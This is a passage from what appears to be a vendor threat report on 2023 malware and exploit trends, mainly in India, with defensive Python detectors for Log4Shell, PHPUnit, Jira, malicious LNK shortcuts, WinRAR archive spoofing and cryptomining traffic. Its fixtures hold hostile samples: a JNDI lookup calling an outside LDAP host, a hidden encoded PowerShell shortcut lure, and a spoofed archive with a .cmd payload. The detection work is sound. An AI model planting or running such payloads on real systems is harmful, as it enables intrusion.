The SMB detections relate to Server Message Block and the WannaCry ransomware attack in May 2017; the chart labels the HTTP exploits' targets as Mailchimp servers, eCommerce modules in Drupal, Jira Server, LDAP servers and DB files.
HTTP/CVE-2017-9841.RCE!PT.42647

CVE-2017-9841 is a critical code injection vulnerability in PHPUnit's Util/PHP/eval-stdin.php. The script evaluates whatever it reads from the php://input wrapper, so an unauthenticated attacker who can reach /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php over HTTP can execute arbitrary PHP code by sending POST data that begins with the substring '<?php '. Patched versions of PHPUnit read from php://stdin instead, which is not attacker-controlled in a web context. The issue affected, among others, the Mailchimp and Mailchimp E-Commerce modules in Drupal, which are used by a substantial number of sites. The practical check is whether that vendor path answers HTTP requests at all: a development dependency should never be web-reachable.

HTTP/CVE-2021-26086.Jira!PT.44523

This detection covers CVE-2021-26086, an actively exploited path traversal vulnerability in the /s/ endpoint of Jira Server and Data Center. A specially crafted HTTP request lets a remote attacker read particular files from the application, /WEB-INF/web.xml being the one most commonly requested.

HTTP/CVE-2021-44228.RCE!AW.45158

CVE-2021-44228, known as Log4Shell, is a critical remote code execution vulnerability in Apache Log4j 2 (versions 2.0-beta9 through 2.14.1). The JNDI features used in configuration, log messages and parameters did not protect against attacker-controlled LDAP and other JNDI-related endpoints, so any logged string containing a lookup such as ${jndi:ldap://...} could make the application fetch and load remote code. Because the lookup is processed wherever the string is logged, the payload can arrive in any field an application logs, not only the URL.
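The three HTTP signatures above reduce to checks on the request path and on attacker-controlled header fields. The following is an added example, not SEQRITE's detection engine or its signature content: it runs those checks over constructed access-log lines (the IP addresses, timestamps and the Jira /s/ traversal request are assumed for illustration) and, for Log4Shell, first collapses the nested ${lower:...}, ${upper:...} and ${...:-x} lookups that attackers use to hide the literal "${jndi:" string.

```python
"""Signature-style checks for the three HTTP exploits above, run over web-server access logs.
Added example; not SEQRITE's detection code. Log lines are constructed."""
import re
from urllib.parse import unquote

# Constructed combined-format access-log lines: ip, timestamp, request, status, size, referer, user-agent.
SAMPLE_LOG = r'''
203.0.113.5 - - [12/Jul/2023:10:01:02 +0530] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 200 512 "-" "curl/7.88"
203.0.113.9 - - [12/Jul/2023:10:01:07 +0530] "GET /s/anything/_/;/WEB-INF/web.xml HTTP/1.1" 200 3021 "-" "python-requests/2.31"
198.51.100.7 - - [12/Jul/2023:10:01:09 +0530] "GET /index.html HTTP/1.1" 200 100 "-" "${${lower:j}ndi:ldap://198.51.100.7:1389/a}"
198.51.100.8 - - [12/Jul/2023:10:01:11 +0530] "GET /login?u=%24%7Bjndi%3Armi%3A%2F%2F198.51.100.8%2Fx%7D HTTP/1.1" 200 100 "-" "Mozilla/5.0"
192.0.2.4 - - [12/Jul/2023:10:01:15 +0530] "GET /about HTTP/1.1" 200 100 "-" "Mozilla/5.0"
'''

LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
                     r'(?P<status>\d+) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$')
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")   # innermost ${...} with no nested braces


def _resolve(m):
    body = m.group(1)
    if ":-" in body:                      # ${env:NOPE:-j} and ${::-j} collapse to the default value
        return body.rsplit(":-", 1)[1]
    prefix, sep, rest = body.partition(":")
    if sep and prefix.lower() in ("lower", "upper"):
        return rest                       # ${lower:J} -> J (case is folded later anyway)
    return m.group(0)                     # leave jndi:... and unknown lookups untouched


def normalize_lookups(text):
    """Collapse nested Log4j lookups used to obfuscate the literal '${jndi:' string."""
    previous = None
    while previous != text:               # repeat until no lookup can be simplified further
        previous, text = text, INNER_LOOKUP.sub(_resolve, text)
    return text


def classify(method, path, user_agent):
    """Return the CVE identifiers whose exploit pattern this request matches."""
    hits = []
    p = unquote(path).lower()
    if method == "POST" and p.split("?", 1)[0].endswith("/util/php/eval-stdin.php"):
        hits.append("CVE-2017-9841")      # PHPUnit eval-stdin.php reachable under /vendor
    if p.startswith("/s/") and "/web-inf/" in p:
        hits.append("CVE-2021-26086")     # Jira /s/ path traversal reaching WEB-INF
    probe = normalize_lookups(unquote(path) + " " + user_agent).lower()
    if "${jndi:" in probe:
        hits.append("CVE-2021-44228")     # Log4Shell lookup in any attacker-controlled field
    return hits


def scan(log_text):
    """Return (client_ip, [cves]) for every log line that matches at least one signature."""
    findings = []
    for line in log_text.strip().splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        hits = classify(m["method"], m["path"], m["ua"])
        if hits:
            findings.append((m["ip"], hits))
    return findings


if __name__ == "__main__":
    for ip, cves in scan(SAMPLE_LOG):
        print(ip, ", ".join(cves))
```

The PHPUnit rule fires only on POST because the exploit needs a body; a GET to the same path still deserves a look, since it proves the file is web-reachable. The Log4Shell normalizer is deliberately conservative: it only rewrites lookups whose prefix it understands, so an unrecognized lookup survives intact rather than being silently dropped.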
Top Host Based Exploits

This section turns to host-based exploits, a critical facet of the threat landscape. It examines detections of the prominent host-based exploits LNK.Exploit.Gen, LNK.Cmd.Exploit.F, LNK.Exploit.Cpl.Gen, LNK.USB.Exploit and JPEG.Exploit.ms04-028, with the focus on their prevalence and impact on individual hosts. Each detection represents a potential gateway for adversaries to compromise system integrity and extract sensitive information. By scrutinizing these instances, the report aims to provide insight into attacker tactics and equip practitioners with the knowledge needed to strengthen defences. The common thread is the Windows shortcut (.LNK) file: a shortcut can point at cmd.exe or a Control Panel item while carrying an icon that makes it look like a document, and it travels well on USB drives.

Host Based Exploit Detections

Detection name | Detections
LNK.Exploit.Gen | 55,11,892 (5.5 mn)
LNK.Cmd.Exploit.F | 1,51,18,452 (15.1 mn)
LNK.Exploit.Cpl.Gen | 15,14,979 (1.5 mn)
LNK.USB.Exploit | 3,12,667
JPEG.Exploit.ms04-028 | 6,23,886

LNK/Pantera is classified as a trojan: malware that performs activities without the user's knowledge. These activities commonly include establishing remote access connections, capturing keyboard input, collecting system information, downloading and uploading files, dropping other malware onto the infected system, performing denial-of-service (DoS) attacks, and running or terminating processes.

Dorkbot, a widespread botnet, specializes in stealing online payment credentials, conducting distributed denial-of-service (DDoS) attacks and delivering other malware. Used globally, it poses a significant threat: infected systems are weaponized for cybercrime, enabling theft of sensitive data, DoS attacks, disabling of security safeguards and distribution of multiple malware strains.
Typically, Dorkbot spreads through malicious links on social networks, instant messaging programs or infected USB devices. Its backdoor functionality empowers remote attackers to download and execute files, harvest logon information and manipulate domain access. Vigilance is crucial to thwart this pervasive threat.

The Jenxcus worm family poses a significant threat by granting malicious hackers unauthorized access to and control of the PC. It can also collect and transmit personal information to the attackers. Infection commonly occurs through drive-by download attacks or visits to compromised web pages, and it can also be introduced through infected removable drives. Users should exercise caution to mitigate the risk of this intrusive and potentially harmful threat.
Dinihou, a worm, gains entry through removable drives and is typically introduced to a system as a file dropped by other malware or unknowingly downloaded by users visiting malicious websites. Once present, it replicates by dropping copies of itself onto all connected removable drives. Worms like Dinihou propagate autonomously to other PCs, copying themselves to removable drives or network folders or spreading through email. This autonomous spread increases the risk of widespread infection and underscores the importance of proactive security measures.

The CVE-2010-2568 detection covers malware exploiting a critical remote code execution vulnerability in specific Microsoft Windows versions. The flaw stems from incorrect parsing of shortcut (.LNK) files: Windows Explorer loads the icon a shortcut references merely to display it, so malicious code runs as soon as a folder or removable drive containing the crafted shortcut is viewed, with no need to open the file. Stuxnet famously exploited this flaw, as did other malware families, and it later played a significant role in exploit kits used in cyber-espionage campaigns.
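The LNK detections above all hinge on what a shortcut actually launches versus what it pretends to be. The following triage parser is an added example, not SEQRITE's detection logic: it reads the ShellLinkHeader and StringData structures of a .LNK file as laid out in MS-SHLLINK (skipping the item ID list and LinkInfo, so the relative path stands in for the target), then applies heuristics a practitioner would use on the LNK.Cmd.Exploit-style lure: a living-off-the-land target, a script in the arguments, a hidden window, whitespace padding that pushes the payload out of the Properties dialog, and a decoy icon. The two sample shortcuts are constructed in code; the encoded PowerShell string is a placeholder.

```python
"""Triage parser for Windows .LNK (Shell Link) files. Added example, not the detection logic
behind the LNK.* signatures above; the sample shortcuts are constructed inline."""
import struct

LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
# LinkFlags (MS-SHLLINK 2.1.1) that decide which optional structures follow the header.
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_RELATIVE_PATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKING_DIR, HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                 (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                 (HAS_ICON_LOCATION, "icon_location"))
SW_SHOWMINNOACTIVE = 7  # window shown minimised and inactive: the usual "run hidden" trick
# Living-off-the-land binaries that a document-looking shortcut has no reason to launch.
LOLBINS = ("cmd.exe", "powershell", "wscript", "cscript", "mshta", "rundll32", "regsvr32", "certutil")


def _string_data(buf, off, unicode):
    """Read one StringData item: CountCharacters (uint16) followed by the characters."""
    count = struct.unpack_from("<H", buf, off)[0]
    off += 2
    size = count * 2 if unicode else count
    raw = buf[off:off + size]
    return raw.decode("utf-16-le" if unicode else "latin-1"), off + size


def parse_lnk(buf):
    """Return the StringData fields and ShowCommand of a Shell Link, skipping ID list and LinkInfo."""
    if (len(buf) < LNK_HEADER_SIZE or struct.unpack_from("<I", buf, 0)[0] != LNK_HEADER_SIZE
            or buf[4:20] != LNK_CLSID):
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", buf, 20)[0]
    fields = {"show_command": struct.unpack_from("<I", buf, 60)[0]}
    off = LNK_HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:          # IDListSize (uint16) + item IDs
        off +=2 + struct.unpack_from("<H", buf, off)[0]
    if flags & HAS_LINK_INFO:                    # LinkInfoSize (uint32) covers the whole structure
        off += struct.unpack_from("<I", buf, off)[0]
    for flag, name in STRING_FIELDS:             # StringData items appear in this fixed order
        if flags & flag:
            fields[name], off = _string_data(buf, off, bool(flags & IS_UNICODE))
    return fields


def triage(fields):
    """Heuristics for the LNK.Cmd.Exploit-style shortcut: returns the list of triggered reasons."""
    reasons = []
    target = fields.get("relative_path", "").lower()
    args = fields.get("arguments", "")
    if any(b in target for b in LOLBINS):
        reasons.append("lolbin-target")
    if any(b in args.lower() for b in LOLBINS):
        reasons.append("script-in-arguments")
    if fields.get("show_command") == SW_SHOWMINNOACTIVE:
        reasons.append("hidden-window")
    if "   " in args:                            # long whitespace runs push the payload out of view
        reasons.append("padded-arguments")
    icon = fields.get("icon_location", "").lower()
    if reasons and ("shell32.dll" in icon or icon.endswith((".pdf", ".docx", ".jpg"))):
        reasons.append("decoy-icon")             # looks like a document, launches something else
    return reasons


def build_lnk(relative_path, arguments="", icon_location="", show_command=1):
    """Construct a minimal Unicode .LNK (test fixture only; real shortcuts also carry an ID list)."""
    flags = (IS_UNICODE | HAS_RELATIVE_PATH | (HAS_ARGUMENTS if arguments else 0)
             | (HAS_ICON_LOCATION if icon_location else 0))
    header = struct.pack("<I16sIIQQQIIIHHII", LNK_HEADER_SIZE, LNK_CLSID, flags, 0x20,
                         0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)

    def item(text):
        return struct.pack("<H", len(text)) + text.encode("utf-16-le")

    body = item(relative_path)
    if arguments:
        body += item(arguments)
    if icon_location:
        body += item(icon_location)
    return header + body


# Constructed samples: a lure running an encoded PowerShell command via cmd.exe, and a benign shortcut.
MALICIOUS_LNK = build_lnk(r"..\..\..\Windows\System32\cmd.exe",
                          "/c " + " " * 120 + "powershell -w hidden -enc SQBFAFgA",
                          r"%SystemRoot%\System32\shell32.dll", SW_SHOWMINNOACTIVE)
BENIGN_LNK = build_lnk(r"..\Reports\Q3.pdf")

if __name__ == "__main__":
    for label, blob in (("malicious", MALICIOUS_LNK), ("benign", BENIGN_LNK)):
        print(label, triage(parse_lnk(blob)))
```

On real samples the item ID list usually carries the absolute target; the relative path and arguments are still present in the lures this report describes, and a shortcut whose arguments alone trip these rules is worth detonating regardless of what the ID list says.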
Android Detections 2023

Mobile devices continue to replace laptops and desktop computers for many functions, including electronic banking, mobile payments, messaging apps and social networks. In fact, 60% of all Internet traffic in 2022 was generated by mobile devices, and in 2022 nearly 71% of mobile devices worldwide ran the Android operating system.

In 2023 the following threats were observed: a significant rise in adware and potentially unwanted applications (PUAs), while malware continues to dominate as a threat for Android. Based on analysis of a 500K installation base, approximately 2-3 attacks per month are detected on Android mobiles. Given the extensive use of mobile devices for office work, this poses a significant risk to corporate networks if such attacks go undetected in the absence of Android protection.

Share of detections across the 500K installation base: Malware 39%, Adware 32%, PUA 29%.
Top Zero Days of 2023

This section looks at the zero-day vulnerabilities that mattered most in 2023: flaws that were exploited in the wild before a fix was available, so that patching alone could not have prevented the first wave of attacks. Five stood out: a SQL injection in MOVEit Transfer, a privilege escalation in the Ultimate Member WordPress plugin, a privilege escalation in Microsoft Outlook, a remote code execution in Windows HTML and Microsoft Office, and a file extension spoofing flaw in WinRAR.

# | CVE | Method | Target | Description
1 | CVE-2023-34362 | SQL Injection | MOVEit Transfer | Grants access to the MOVEit Transfer database if exploited by unauthorized individuals
2 | CVE-2023-3460 | Privilege Escalation | User registration and account management plugin in the WordPress CMS | Creates users with admin privileges on WordPress websites running vulnerable versions of the Ultimate Member plugin
3 | CVE-2023-23397 | Privilege Escalation | Windows Microsoft Outlook | Lets the attacker authenticate as the intended user and launch relay attacks
4 | CVE-2023-36884 | Remote Code Execution | Windows HTML and Microsoft Office | Runs scripts remotely and gets past established system defences
5 | CVE-2023-38831 | File extension spoofing | WinRAR | Archive contains executable content that is processed instead of the file the user opened
CVE-2023-34362: SQL Injection in MOVEit Transfer

The discovery of a zero-day vulnerability in MOVEit Transfer drew attention to the risk of unauthorized access, since MOVEit Transfer is widely used by enterprises as a secure managed file transfer product, moving data over protocols such as SFTP, SCP and HTTP-based uploads. The SQL injection vulnerability grants unauthorized individuals access to the MOVEit Transfer database. It was actively targeted, with attackers exploiting unpatched systems over HTTP or HTTPS.

CVE-2023-36884: Remote Code Execution in Microsoft Office and Windows HTML

A major security flaw in Windows HTML and Microsoft Office was identified as CVE-2023-36884. It is a remote code execution vulnerability, which gives an attacker a way to run code remotely and get past established system defences. The exploit involves crafting malicious Microsoft Office documents that, when opened, run remote malware.

CVE-2023-23397: Microsoft Outlook Privilege Escalation

The Windows Microsoft Outlook client has a vulnerability, CVE-2023-23397, that is exploited by sending a specially crafted email which triggers automatically when the Outlook client processes it. No user involvement is required; the message does not even need to be opened. Exploitation exposes the targeted user's Net-NTLMv2 hash, which the threat actor can use to authenticate as that user and launch relay attacks against other systems that accept NTLMv2.

CVE-2023-38831: File Extension Spoofing in WinRAR

CVE-2023-38831 is an RCE vulnerability in WinRAR prior to version 6.23. The problem arises because a ZIP archive may contain both a harmless file (such as an ordinary .JPG) and a folder with the same name as that file. When the user attempts to open only the benign file, the contents of the folder, which can contain executable content, are processed instead.

CVE-2023-3460: Privilege Escalation in the Ultimate Member WordPress Plugin

A well-known user registration and account management plugin for the WordPress content management system has a privilege escalation vulnerability that allows malicious actors to create users with admin privileges on websites running vulnerable versions of the Ultimate Member plugin. This can have serious repercussions, up to the WordPress website being completely taken over.
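The WinRAR flaw above is visible in the archive listing alone: a top-level file and a folder whose names differ only by a trailing space, with something executable inside the folder. The following check is an added example, not part of the report: it builds a ZIP with that layout in memory (the member names and contents are constructed), then reports every decoy/folder pair that carries script or executable content, alongside an ordinary archive for comparison. It inspects ZIP archives only, which is the container the CVE description concerns; the archive reader used for the test is Python's own, not WinRAR.

```python
"""Check for the CVE-2023-38831 archive layout described above: a harmless-looking file next to a
folder of the same name whose contents are executed when the user opens the file. Added example,
not the original report's code; archives are built in memory with constructed contents."""
import io
import posixpath
import zipfile

SCRIPT_EXTENSIONS = {".cmd", ".bat", ".exe", ".vbs", ".js", ".ps1", ".lnk", ".scr", ".com", ".hta"}


def build_zip(entries):
    """Build a ZIP from {member_name: bytes}; names are kept verbatim, trailing spaces included."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    return buf.getvalue()


def find_cve_2023_38831(zip_bytes):
    """Return one finding per (decoy file, same-named folder) pair that carries executable content."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        names = zf.namelist()
    top_level_files, folder_members = {}, {}
    for name in names:
        head, sep, tail = name.partition("/")
        key = head.rstrip(" ")           # the spoofed pair differs only by a trailing space
        if not sep:
            top_level_files[key] = name
        elif tail:                       # ignore bare directory entries such as "x.jpg /"
            folder_members.setdefault(key, []).append(name)
    findings = []
    for key, decoy in top_level_files.items():
        payloads = [m for m in folder_members.get(key, [])
                    if posixpath.splitext(m.rstrip(" "))[1].lower() in SCRIPT_EXTENSIONS]
        if payloads:
            findings.append({"decoy": decoy, "folder": key, "payloads": payloads,
                             "trailing_space": decoy != key})
    return findings


# Constructed samples: the lure layout from the report, and an ordinary archive.
LURE_ZIP = build_zip({
    "invoice.jpg ": b"\xff\xd8\xff\xe0 not really a picture",           # decoy with trailing space
    "invoice.jpg /invoice.jpg .cmd": b"@echo off\r\nstart calc.exe\r\n",  # runs when the decoy is opened
})
BENIGN_ZIP = build_zip({"invoice.jpg": b"\xff\xd8\xff\xe0", "docs/readme.txt": b"hello"})

if __name__ == "__main__":
    print(find_cve_2023_38831(LURE_ZIP))
    print(find_cve_2023_38831(BENIGN_ZIP))
```

A file name ending in a space cannot normally be created from Windows Explorer, so the trailing_space flag on its own is a strong signal even when the folder contains nothing the extension list recognises.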
India Malware Landscape
India Malware Landscape: Geographical Analysis

290 mn detections. Top 10 states with the highest malware detections: ~70% of the total detections originate from these states (figure values, ordered by detections per endpoint).

State | Detections/endpoint (%) | Detections
Telangana | 15% | 13.88 mn
Tamil Nadu | 14% | 20.14 mn
Delhi | 11% | 60.64 mn
Gujarat | 11% | 51.99 mn
Karnataka | 10% | 23.69 mn
Maharashtra | 9% | 71.68 mn
Haryana | 8% | 11 mn
West Bengal | 8% | 27.90 mn
Madhya Pradesh | 7% | 9.26 mn
Uttar Pradesh | 7% | 21.53 mn

Map source: https://www.surveyofindia.gov.in/pages/outline-maps-of-india. Disclaimer: the data has been rationalized and the insights are depicted as per the SEQRITE installation base.

The number of detections varies across states depending on the installation base, the availability of computing devices and the presence of IT/ITeS industries. Telangana and Tamil Nadu have the highest ratio of detections per installation, while Maharashtra, Gujarat and Delhi have the highest absolute number of detections. Gujarat and Madhya Pradesh show an increase in detections, reflecting the emergence of new IT/ITeS hubs in these states.
160 mn detections. Top 10 cities with the highest malware detections: ~40% of the total detections originate from these cities. The figure lists Surat, Gurgaon, Delhi NCR, Kolkata, Chennai, Hyderabad, Ahmedabad, Mumbai, Pune and Bengaluru with their detections per endpoint (ranging from 6% to 15%) and absolute detections (ranging from ~7.5 mn to ~27 mn). Map source: https://www.surveyofindia.gov.in/pages/outline-maps-of-india. Disclaimer: the data has been rationalized and the insights are depicted as per the SEQRITE installation base.

A city-wise analysis reveals that Mumbai, Pune, Chennai and Bengaluru have the highest number of detections in absolute terms. Surat and Ahmedabad, which have emerged as new IT/ITeS hubs, have high detections relative to their installation base. The top 10 cities account for more than 50% of the detections, while the remaining detections are spread across tier II and III cities and towns in India, possibly reflecting the rise of work-from-hometown culture during the pandemic.
India Malware Landscape: Sectoral Analysis

Industry-wise percentage of detections per installation base

Sector | Detections per installation base
Automobile Supply Chain | 13%
Government | 10%
Education | 10%
Power & Energy | 8%
Hospitality | 8%
Healthcare | 8%
Logistics | 7%
Media & Entertainment | 7%
Manufacturing | 6%
Strategic & Public Enterprises | 5%
Transport | 5%
Professional Services | 4%
Telecom | 4%
IT/ITES | 2%
BFSI | 3%

The automotive supply chain, government and education are the three industry segments with the highest malware detections per installation base. The automotive industry, once relatively immune to widespread threats, has become a prime target for actors seeking to disrupt operations, steal sensitive data and compromise supply chains; in 2023 we observed an escalation in both the volume and the impact of cyber attacks on the sector.

India is among the countries most exposed to state-sponsored threat actors, especially those targeting government agencies. Some of these attacks are orchestrated by state-backed actors around strategic occasions such as the G20 summit.

The education sector faces common attack vectors such as phishing and user account compromise. Account compromise is prevalent because the sector manages a variety of accounts for staff, third-party contractors, educators, students, alumni and others, with a high turnover rate. The most dominant threat in the education sector was W32.Neshta.C8, a file infector that poses a formidable challenge to educational institutions.
The power and energy sector in India is a critical component of the country's economic growth story, making it a lucrative target for attackers who can cause significant service disruptions and physical damage to infrastructure. Attackers target different departments such as supply and procurement, cloud and infrastructure, legal, IT and OT. Cyber supply chain risk visibility is essential to mitigate threats in this sector. A revived new variant of the Expiro infector has the highest detections here.

As India digitalizes its healthcare sector, securing its online systems has become imperative. According to a study by Sophos, a UK-based cybersecurity firm, reported by the Economic Times, nearly 60% of healthcare organizations in India experienced a cyberattack in the past 12 months. A Nimda variant was the most prominent threat, with the highest detections in the healthcare and hospitality segments.

Indian manufacturing firms faced increased risk from unsecured IoT devices connected to the network, more than any other sector, and manufacturing organizations believe that 5G adoption will widen security gaps. The sector suffered ransomware attacks that halted manufacturing operations, and SMEs in this segment endured sophisticated social engineering phishing attacks.

In addition to manufacturing, the logistics, banking and financial sectors are also on the radar of attackers. The financial sector is leading the digital transformation and, with the platform economy in action, attacks on low-value transaction businesses are also relevant. Lending apps that request access to sensitive information surged in India during this period.

Top malware per sector (SEQRITE telemetry, 2023)

W32.Expiro.R3 | Power & Energy | 13,000+ detections | ~2,000 endpoints | ~5 in every 10 detections
Trait: Infects files by appending its virus code to them. Enters the system via cracked software, drive-by downloads and malvertising campaigns. Steals browser certificates and passwords and stores them at %AppData%\<random_hex_values>.bin. Creates mutexes.

Trojan.NSIS.Miner.SD | Automobiles | 2,17,000+ detections | ~11,800 endpoints | ~6 in every 10 detections
Trait: Gains access via hacked sites or links, installs from malicious sources, auto-runs at startup, alters system files and registry, degrades performance with resource-intensive bitcoin mining, and opens a backdoor for other malware.

Remoteadmin.Remoteexec | Government | 3,04,000+ detections | ~2,84,000 endpoints | ~2 in every 10 detections
Trait: Enables remote installation, execution and updating of applications, programs and files on Windows network systems. It is a remote-administration tool by design; the detection matters on hosts where no administrator deployed it.

W32.Neshta.C8 | Education | 8,53,000+ detections | ~1,58,000 endpoints | ~4 in every 10 detections
Trait: Self-extracts data, executes a dropped binary and establishes autorun at Windows startup.

Trojan.YakbeexMSIL.ZZ4 | Logistics | 11,000+ detections | ~3,900 endpoints | ~2 in every 10 detections
Trait: Employs multiple techniques: extracting code, allocating memory, dropping and executing binaries, using Windows utilities, keystroke logging, autorun at startup, manipulating file attributes to fake deletion, self-replication, altering Explorer settings, encrypting files, and obstructing access to the victim's workstation.

Trojan.KillAv.DR | Professional Services | 5,02,000+ detections | ~2,85,000 endpoints | ~2 in every 10 detections
Trait: Drops a file and can deliver and execute well-known malware such as Skype spyware or antivirus service killers; it also transmits the victim's IP address and related data to the malware authors, often disguising itself with icons resembling genuine Windows applications.

Trojan.Rdpwrap | Media & Entertainment | 10,500+ detections | ~13,800 endpoints | ~1 in every 10 detections
Trait: Introduces a vulnerability that allows attackers to infiltrate and deploy trojan horse software for unauthorized data access and control.

PIF.StucksNet.A | Manufacturing | 3,32,000+ detections | ~2,20,000 endpoints | ~1 in every 10 detections
Trait: Deploys a .LNK file as a shortcut to its main executable, leveraging CVE-2010-2568 to execute arbitrary code on victim machines, the vulnerability famously exploited by Stuxnet.

Script.Trojan.A3676696 | Transport | 4,700+ detections | ~1,600 endpoints | ~4 in every 10 detections
Trait: Quarantine to prevent spreading, or removal of the files entirely, as per F-Secure security settings.

W32.Pioneer.CZ1 | BFSI | 87,000+ detections | ~47,000 endpoints | ~5 in every 10 detections
Trait: Infects files, deploys a malicious DLL and sends system information to a remote server.

Trojan.Shadowbrokers | Strategic & Public Enterprises | 12,600+ detections | ~4,800 endpoints | ~2 in every 10 detections
Trait: Exploits specific SMB vulnerabilities, named after the Shadow Brokers, the group that leaked the Equation Group's exploits.

Worm.AUTOIT.Tupym.A | IT/ITES | 48,500+ detections | ~69,900 endpoints | ~1 in every 10 detections
Trait: Drops and executes a file in the system32 folder, connects to a malicious website, alters the browser's start page via registry modification, and creates a persistent Run entry for the dropped file.

Nsis.Bitmin | Telecom | 7,000+ detections | ~1,600 endpoints | ~7 in every 10 detections
Trait: Mines cryptocurrency on the infected host, causing performance issues and intrusive ads; prompt removal is needed to safeguard the system.
Featured Stories 2023
Cryptocurrency Conundrum: Unveiling the Enigma of Cryptojacking Exploits

Criticality: High | Sectors Targeted: All | Countries Affected: Worldwide

Cryptojacking is illegal cryptomining: a cybercriminal secretly uses someone else's computing resources, without their knowledge or permission, to mine cryptocurrency. Large-scale cryptojacking is emerging as a popular trend in cybercrime. Mining does not require extensive technical expertise, as the essential tools are frequently open source or easily purchased, and the emergence of cloud mining has increased the likelihood of incidents. Moreover, the algorithm commonly used in cryptojacking runs efficiently on CPUs, so no GPU is needed; this lets malicious actors deploy miners such as XMRig across ordinary devices, including cloud services (for example Kubernetes clusters abused to mine the cryptocurrency Dero) and even Android devices.

Over the past year there has been an observed increase in hits from the NiceHashMiner payload, peaking in July 2023. A rise in cross-platform malware is also observed. Security professionals should be vigilant for the following malware associated with cryptojacking attacks: HonkBox (macOS), ScrubCrypt (targets Oracle WebLogic servers and bypasses Windows Defender protections), the Lucifer trojan (targets both Windows and Linux), and the Qubitstrike campaign (targets Jupyter Notebooks). The practical tell is the same everywhere: sustained CPU use by a process that has no reason to be busy, plus outbound connections to mining pools.
Cryptojacking in numbers: 37% annual increase in cases; 14.3 mn detections; XMRig the most prominent malicious payload; cross-platform malware on the rise.

How browser-based cryptojacking works (attacker, victim/user, website, mining service provider):
1. The attacker inserts a malicious script into the website.
2. The victim accesses that website.
3. The script requests a mining task.
4. The service provider assigns a task.
5. The script executes the task on the victim's machine.
6. Mining is performed.
7. The results of mining are sent to the service provider.
8. The results are sent to the attacker.
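Steps 3 to 7 above are, on the wire, a stratum JSON-RPC session: the miner logs in with the attacker's wallet, the pool hands out jobs, and the miner submits shares. The following is an added example, not from the report: it reconstructs such a session as XMRig-style messages from both sides (the pool, wallet, job blobs and nonces are constructed placeholders) and shows how a network sensor can recover the wallet, the miner agent and the share count from captured payloads, ignoring unrelated traffic on the same flow.

```python
"""Reconstructs the exchange in steps 3 to 7 of the diagram above (script asks for work, the
service provider assigns it, results go back) as XMRig-style stratum JSON-RPC messages and
identifies it from captured TCP payloads. Added example, not from the report; the pool, wallet
and messages are constructed."""
import json

CLIENT_METHODS = {"login", "submit", "keepalived", "mining.subscribe", "mining.authorize", "mining.submit"}
MINER_AGENTS = ("xmrig", "nicehash", "cpuminer", "xmr-stak")
FAKE_WALLET = "4" + "B" * 94   # constructed; standard Monero addresses are 95 characters starting with 4

# Constructed session: "C" = infected host, "S" = pool on tcp/3333.
SESSION = [
    ("C", '{"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"%s","pass":"x",'
          '"agent":"XMRig/6.21.0","algo":["rx/0"]}}' % FAKE_WALLET),
    ("S", '{"id":1,"jsonrpc":"2.0","result":{"id":"sess-7f3a","job":{"blob":"0e0e...","job_id":"j1",'
          '"target":"b88d0600","algo":"rx/0","height":3000000},"status":"OK"},"error":null}'),
    ("S", '{"jsonrpc":"2.0","method":"job","params":{"blob":"0e0e...","job_id":"j2",'
          '"target":"b88d0600","algo":"rx/0","height":3000001}}'),
    ("C", '{"id":2,"jsonrpc":"2.0","method":"submit","params":{"id":"sess-7f3a","job_id":"j2",'
          '"nonce":"8a1c0000","result":"5f2c...0000"}}'),
    ("S", '{"id":2,"jsonrpc":"2.0","result":{"status":"OK"},"error":null}'),
    ("C", "GET / HTTP/1.1\r\nHost: example.invalid\r\n\r\n"),   # unrelated traffic, ignored
]


def summarize_session(messages):
    """Walk (direction, payload) pairs and return what the session reveals about the miner."""
    s = {"is_mining": False, "known_miner": False, "agent": None, "wallet": None,
         "algos": set(), "jobs": 0, "shares_submitted": 0, "shares_accepted": 0}
    pending = {}   # request id -> method, so pool replies can be matched to submits
    for direction, payload in messages:
        try:
            msg = json.loads(payload)
        except ValueError:
            continue                      # not JSON-RPC at all
        if not isinstance(msg, dict):
            continue
        method, params = msg.get("method"), msg.get("params") or {}
        if direction == "C" and method in CLIENT_METHODS:
            s["is_mining"] = True
            pending[msg.get("id")] = method
            if method == "login":         # step 3: the script asks the provider for work
                s["agent"], s["wallet"] = params.get("agent"), params.get("login")
                s["algos"].update(params.get("algo", []))
            elif method == "submit":      # step 7: a share goes back to the provider
                s["shares_submitted"] += 1
        elif direction == "S":
            result = msg.get("result")
            if method == "job" or (isinstance(result, dict) and "job" in result):
                s["jobs"] += 1            # step 4: the provider assigns a task
            if (isinstance(result, dict) and pending.pop(msg.get("id"), None) == "submit"
                    and result.get("status") == "OK"):
                s["shares_accepted"] += 1
    if s["agent"] and s["agent"].lower().startswith(MINER_AGENTS):
        s["known_miner"] = True
    return s


if __name__ == "__main__":
    print(summarize_session(SESSION))
```

Matching on method names rather than on port numbers matters because pools are routinely reached over 443 or through TLS; the wallet address recovered from the login message is the one indicator that ties separate infected hosts to the same campaign.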
Uncovering LockBit Black's Attack Chain and Anti-forensic Activity

Criticality: High | Sectors Targeted: Healthcare, Finance, Manufacturing, Transportation and Government agencies | Countries Affected: United States, United Kingdom, Canada, Japan, Germany, India

